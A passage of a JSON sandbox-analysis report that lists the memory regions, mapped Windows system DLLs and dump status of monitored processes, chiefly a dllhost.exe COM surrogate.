"readable" ], "ref_process_dump": null, "size": 16384, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 5980159, "entry_point": 5963776, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1396", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 5963776, "timestamp": "00:00:50.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 24903680, "type": "region", "version": 1 }, "end_va": 25321471, "entry_point": 24903680, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_1397", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 24903680, "timestamp": "00:00:50.959", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 26279936, "type": "region", "version": 1 }, "end_va": 30420991, "entry_point": 0, "filename": null, "id": "region_1398", "name": "pagefile_0x0000000001910000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 26279936, "timestamp": "00:00:50.961", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966321663, "entry_point": 1966248889, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1399", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:00:50.970", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 6033407, "entry_point": 0, "filename": null, "id": "region_1400", "name": "pagefile_0x00000000005c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6029312, "timestamp": "00:00:50.972", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\system32\\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}", "filename": "c:\\windows\\system32\\dllhost.exe", "id": "proc_5", "image_name": "dllhost.exe", "monitor_reason": "rpc_server", "monitored_id": 5, "origin_monitor_id": 4, "ref_parent_process": { "ref_id": "proc_4", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_800", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:47.132", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000801-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_152", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_801", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:47.133", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_802", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:47.133", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 684031, "entry_point": 262144, "filename": "\\Windows\\System32\\locale.nls", "id": "region_803", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:47.133", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000804-addr_0x00000000000b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_153", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_804", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:00:47.133", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_805", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:47.133", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000806-addr_0x00000000000d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_154", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_806", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:00:47.133", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_807", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:00:47.133", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000808-addr_0x00000000001e0000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_155", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2097151, "entry_point": 0, "filename": null, "id": "region_808", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:00:47.134", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2105343, "entry_point": 0, "filename": null, "id": "region_809", "name": "pagefile_0x0000000000200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2097152, "timestamp": "00:00:47.134", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000810-addr_0x0000000000210000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_156", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_810", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:47.134", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 3244031, "entry_point": 0, "filename": null, "id": "region_811", "name": "pagefile_0x0000000000250000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2424832, "timestamp": "00:00:47.134", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3350527, "entry_point": 0, "filename": null, "id": "region_812", "name": "pagefile_0x0000000000330000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3342336, "timestamp": "00:00:47.134", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000813-addr_0x0000000000380000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_157", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_813", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:00:47.134", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000814-addr_0x0000000000420000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_158", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4390911, "entry_point": 0, "filename": null, "id": "region_814", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:00:47.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 5443583, "entry_point": 0, "filename": null, "id": "region_815", "name": "pagefile_0x0000000000430000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4390912, "timestamp": "00:00:47.135", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000816-addr_0x0000000000590000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_159", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_816", "name": "private_0x0000000000590000", "norm_filename": null, "region_type": "private_memory", "start_va": 5832704, "timestamp": "00:00:47.135", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000817-addr_0x00000000005d0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_160", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 6356991, "entry_point": 0, "filename": null, "id": "region_817", "name": "private_0x00000000005d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6094848, "timestamp": "00:00:47.135", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000818-addr_0x0000000000670000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_161", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 6750208, "type": "region", "version": 1 }, "end_va": 7012351, "entry_point": 0, "filename": null, "id": "region_818", "name": "private_0x0000000000670000", "norm_filename": null, "region_type": "private_memory", "start_va": 6750208, "timestamp": "00:00:47.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 7925759, "entry_point": 0, "filename": null, "id": "region_819", "name": "pagefile_0x00000000006b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7012352, "timestamp": "00:00:47.135", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000820-addr_0x00000000007a0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_162", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 7995392, "type": "region", "version": 1 }, "end_va": 8257535, "entry_point": 0, "filename": null, "id": "region_820", "name": "private_0x00000000007a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7995392, "timestamp": "00:00:47.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 8978432, "type": "region", "version": 1 }, "end_va": 8998911, "entry_point": 8978432, "filename": "\\Windows\\System32\\dllhost.exe", "id": "region_821", "name": "dllhost.exe", "norm_filename": "c:\\windows\\system32\\dllhost.exe", "region_type": "memory_mapped_file", "start_va": 8978432, "timestamp": "00:00:47.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 9043968, "type": "region", "version": 1 }, "end_va": 21626879, "entry_point": 0, "filename": null, "id": "region_822", "name": "pagefile_0x00000000008a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9043968, "timestamp": "00:00:47.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 21626880, "type": "region", "version": 1 }, "end_va": 24571903, "entry_point": 21626880, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_823", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 21626880, "timestamp": "00:00:47.141", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000824-addr_0x00000000018f0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_163", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 26148864, "type": "region", "version": 1 }, "end_va": 26411007, "entry_point": 0, "filename": null, "id": "region_824", "name": "private_0x00000000018f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 26148864, "timestamp": "00:00:47.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 663552, "start_va": 1588461568, "type": "region", "version": 1 }, "end_va": 1589125119, "entry_point": 1588468659, "filename": "\\Windows\\System32\\appwiz.cpl", "id": "region_825", "name": "appwiz.cpl", "norm_filename": "c:\\windows\\system32\\appwiz.cpl", "region_type": "memory_mapped_file", "start_va": 1588461568, "timestamp": "00:00:47.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1859649536, "type": "region", "version": 1 }, "end_va": 1859682303, "entry_point": 1859663794, "filename": "\\Windows\\System32\\osbaseln.dll", "id": "region_826", "name": "osbaseln.dll", "norm_filename": "c:\\windows\\system32\\osbaseln.dll", "region_type": "memory_mapped_file", "start_va": 1859649536, "timestamp": "00:00:47.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2359296, "start_va": 1895563264, "type": "region", "version": 1 }, "end_va": 1897922559, "entry_point": 1895589565, "filename": "\\Windows\\System32\\msi.dll", "id": "region_827", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 1895563264, "timestamp": "00:00:47.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 192512, "start_va": 1937047552, "type": "region", "version": 1 }, "end_va": 1937240063, "entry_point": 1937098658, "filename": "\\Windows\\System32\\duser.dll", "id": "region_828", "name": "duser.dll", "norm_filename": "c:\\windows\\system32\\duser.dll", "region_type": "memory_mapped_file", "start_va": 1937047552, "timestamp": "00:00:47.143", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1939668992, "type": "region", "version": 1 }, "end_va": 1939931135, "entry_point": 1939710685, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_829", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1939668992, "timestamp": "00:00:47.143", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1947992064, "type": "region", "version": 1 }, "end_va": 1948073983, "entry_point": 1947999657, "filename": "\\Windows\\System32\\atl.dll", "id": "region_830", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1947992064, "timestamp": "00:00:47.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1948975104, "type": "region", "version": 1 }, "end_va": 1950670847, "entry_point": 1949165237, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_831", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1948975104, "timestamp": "00:00:47.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1952448512, "type": "region", "version": 1 }, "end_va": 1953452031, "entry_point": 1952517534, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_832", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1952448512, "timestamp": "00:00:47.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1958871040, "type": "region", "version": 1 }, "end_va": 1959112703, "entry_point": 1958875789, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_833", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1958871040, "timestamp": "00:00:47.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1961295872, "type": "region", "version": 1 }, "end_va": 1961385983, "entry_point": 1961307587, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_834", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1961295872, "timestamp": "00:00:47.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1966346465, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_835", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:00:47.146", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1966997504, "type": "region", "version": 1 }, "end_va": 1967054847, "entry_point": 1967002165, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_836", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1966997504, "timestamp": "00:00:47.146", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_837", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:47.147", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_838", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:47.147", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_839", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:47.148", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_840", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:47.149", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_841", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:00:47.150", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_842", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:47.150", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_843", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:47.151", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1987522559, "entry_point": 1986995154, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_844", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:00:47.151", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_845", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:47.152", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_846", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:47.152", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_847", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:47.152", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_848", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:47.153", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_849", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:47.153", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_850", "name": "oleaut32.dll", 